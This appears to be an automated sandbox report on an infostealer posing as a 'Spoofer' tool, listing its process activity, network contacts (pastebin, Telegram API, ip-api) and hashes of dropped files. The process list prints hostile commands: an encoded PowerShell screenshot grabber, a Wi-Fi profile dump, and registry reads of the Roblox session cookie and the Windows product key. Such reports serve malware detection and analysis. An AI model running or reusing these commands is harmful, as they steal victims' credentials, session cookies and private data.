C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic bios get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kpo4xmkb\kpo4xmkb.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32D3.tmp" "c:\Users\Admin\AppData\Local\Temp\kpo4xmkb\CSCAAEAC91A688F4922953866F06F81D873.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "hostname"

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c title LKcmdPerm SpooferV2.0.1 I KERNELMODE ENABLE I WELCOME Tyebxljn

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c color 0b

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
US 208.95.112.1:80 ip-api.com tcp
GB 216.58.204.67:443 gstatic.com tcp
US 8.8.8.8:53 67.204.58.216.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
US 208.95.112.1:80 ip-api.com tcp
NL 149.154.167.220:443 api.telegram.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\LKPerm.exe

MD5 2b294a8817d326c1e1305ce914688b91
SHA1 b0027fc13ed4b1f1be406f0ef86dee845726a063
SHA256 1afd5a86aaf077ef695981df90cba9e673f56e4adfb575ccacbf79343c7b30f7
SHA512 cbdc488319d858babe564965e10c0a01c122e1d0f65210618e40c3ae97cdee1e8102afcb2c851cb138da4f085957522f5cf5ac94a27e9eb25d57337a1e7c9b72

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 69801d1a0809c52db984602ca2653541
SHA1 0f6e77086f049a7c12880829de051dcbe3d66764
SHA256 67aca001d36f2fce6d88dbf46863f60c0b291395b6777c22b642198f98184ba3
SHA512 5fce77dd567c046feb5a13baf55fdd8112798818d852dfecc752dac87680ce0b89edfbfbdab32404cf471b70453a33f33488d3104cd82f4e0b94290e83eae7bb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 7c14c7bc02e47d5c8158383cb7e14124
SHA1 5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3
SHA256 00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5
SHA512 af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 90f080c53a2b7e23a5efd5fd3806f352
SHA1 e3b339533bc906688b4d885bdc29626fbb9df2fe
SHA256 fa5e6fe9545f83704f78316e27446a0026fbebb9c0c3c63faed73a12d89784d4
SHA512 4b9b8899052c1e34675985088d39fe7c95bfd1bbce6fd5cbac8b1e61eda2fbb253eef21f8a5362ea624e8b1696f1e46c366835025aabcb7aa66c1e6709aab58a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libssl-3.dll

MD5 4ff168aaa6a1d68e7957175c8513f3a2
SHA1 782f886709febc8c7cebcec4d92c66c4d5dbcf57
SHA256 2e4d35b681a172d3298caf7dc670451be7a8ba27c26446efc67470742497a950
SHA512 c372b759b8c7817f2cbb78eccc5a42fa80bdd8d549965bd925a97c3eebdce0335fbfec3995430064dead0f4db68ebb0134eb686a0be195630c49f84b468113e3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 123ad0908c76ccba4789c084f7a6b8d0
SHA1 86de58289c8200ed8c1fc51d5f00e38e32c1aad5
SHA256 4e5d5d20d6d31e72ab341c81e97b89e514326c4c861b48638243bdf0918cfa43
SHA512 80fae0533ba9a2f5fa7806e86f0db8b6aab32620dde33b70a3596938b529f3822856de75bddb1b06721f8556ec139d784bc0bb9c8da0d391df2c20a80d33cb04

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_brotli.pyd

MD5 9ad5bb6f92ee2cfd29dde8dd4da99eb7
SHA1 30a8309938c501b336fd3947de46c03f1bb19dc8
SHA256 788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8
SHA512 a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_hashlib.pyd

MD5 a25bc2b21b555293554d7f611eaa75ea
SHA1 a0dfd4fcfae5b94d4471357f60569b0c18b30c17
SHA256 43acecdc00dd5f9a19b48ff251106c63c975c732b9a2a7b91714642f76be074d
SHA512 b39767c2757c65500fc4f4289cb3825333d43cb659e3b95af4347bd2a277a7f25d18359cedbdde9a020c7ab57b736548c739909867ce9de1dbd3f638f4737dc5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_queue.pyd

MD5 e1c6ff3c48d1ca755fb8a2ba700243b2
SHA1 2f2d4c0f429b8a7144d65b179beab2d760396bfb
SHA256 0a6acfd24dfbaa777460c6d003f71af473d5415607807973a382512f77d075fa
SHA512 55bfd1a848f2a70a7a55626fb84086689f867a79f09726c825522d8530f4e83708eb7caa7f7869155d3ae48f3b6aa583b556f3971a2f3412626ae76680e83ca1

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md.pyd

MD5 d9e0217a89d9b9d1d778f7e197e0c191
SHA1 ec692661fcc0b89e0c3bde1773a6168d285b4f0d
SHA256 ecf12e2c0a00c0ed4e2343ea956d78eed55e5a36ba49773633b2dfe7b04335c0
SHA512 3b788ac88c1f2d682c1721c61d223a529697c7e43280686b914467b3b39e7d6debaff4c0e2f42e9dddb28b522f37cb5a3011e91c66d911609c63509f9228133d

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\charset_normalizer\md__mypyc.pyd

MD5 bf9a9da1cf3c98346002648c3eae6dcf
SHA1 db16c09fdc1722631a7a9c465bfe173d94eb5d8b
SHA256 4107b1d6f11d842074a9f21323290bbe97e8eed4aa778fbc348ee09cc4fa4637
SHA512 7371407d12e632fc8fb031393838d36e6a1fe1e978ced36ff750d84e183cde6dd20f75074f4597742c9f8d6f87af12794c589d596a81b920c6c62ee2ba2e5654

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\unicodedata.pyd

MD5 a8ed52a66731e78b89d3c6c6889c485d
SHA1 781e5275695ace4a5c3ad4f2874b5e375b521638
SHA256 bf669344d1b1c607d10304be47d2a2fb572e043109181e2c5c1038485af0c3d7
SHA512 1c131911f120a4287ebf596c52de047309e3be6d99bc18555bd309a27e057cc895a018376aa134df1dc13569f47c97c1a6e8872acedfa06930bbf2b175af9017

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 5377ab365c86bbcdd998580a79be28b4
SHA1 b0a6342df76c4da5b1e28a036025e274be322b35
SHA256 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93
SHA512 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\plugin\run.bat

MD5 16bba83c87bfbe567572aa42803e4001
SHA1 ab41f7b40ac02fd4a3c47bd1ea95e2cbff6a3af6
SHA256 e6b3d93588c9a5a44f8f162f9928ce745138bd9d4ac9fd43bbdd2f20caf6ab45
SHA512 ca6210895e5b5a08abfa619fac1cb84b0299a0a63016ae8f3e2d47601aa5ed4134bd88bcf911037d5f786b25017f0758c059253cc8b24f07f7fdfd67fc432153

C:\Users\Admin\AppData\Local\Temp\onefile_3344_133752087148723759\plugin.exe

MD5 8f0d4c1ab369737cbfee9bd1a84f87a3
SHA1 09a371c621f788450523961a75ae31b0631ad6af
SHA256 31468061fbaf78650c2046c7458fa54b762fe00b5abba52b85063ce6dd357770
SHA512 87bff47dbaf3136c527acf89ee4532e0f54d2694dfa5ce9cc6bcca3b0f49bd16e31d616efd8d0813be2f732e66ac3614481984c7a73025c5fed20c117f368faa

C:\Users\Admin\AppData\Local\Temp\ONEFIL~2\sqlite3.dll

MD5 f3592da629e4f247598e232b2cbfbac1
SHA1 65429fbec3f5545640f2cda784dc7dcca420eb3b
SHA256 054a7b736de7afbd447b07ee5e72df2febcaa06758f7a028873771567e8735d3
SHA512 6fc24890a7be1ed73f1efdf2b7723c3a7de5ddb36b87ff7b01949fc2b14813e7b7c8b8311abee2796a9a4efffedfc1d2020ffa794e59004ca4fb6798b993190d

memory/3544-142-0x00007FF667340000-0x00007FF6685D1000-memory.dmp

memory/4800-166-0x00007FF7AABA0000-0x00007FF7AB738000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_wmi.pyd

MD5 827615eee937880862e2f26548b91e83
SHA1 186346b816a9de1ba69e51042faf36f47d768b6c
SHA256 73b7ee3156ef63d6eb7df9900ef3d200a276df61a70d08bd96f5906c39a3ac32
SHA512 45114caf2b4a7678e6b1e64d84b118fb3437232b4c0add345ddb6fbda87cebd7b5adad11899bdcd95ddfe83fdc3944a93674ca3d1b5f643a2963fbe709e44fb8

C:\Users\Admin\AppData\Local\Temp\onefile_4800_133752087087978331\_decimal.pyd

MD5 7ae94f5a66986cbc1a2b3c65a8d617f3
SHA1 28abefb1df38514b9ffe562f82f8c77129ca3f7d
SHA256 da8bb3d54bbba20d8fa6c2fd0a4389aec80ab6bd490b0abef5bd65097cbc0da4
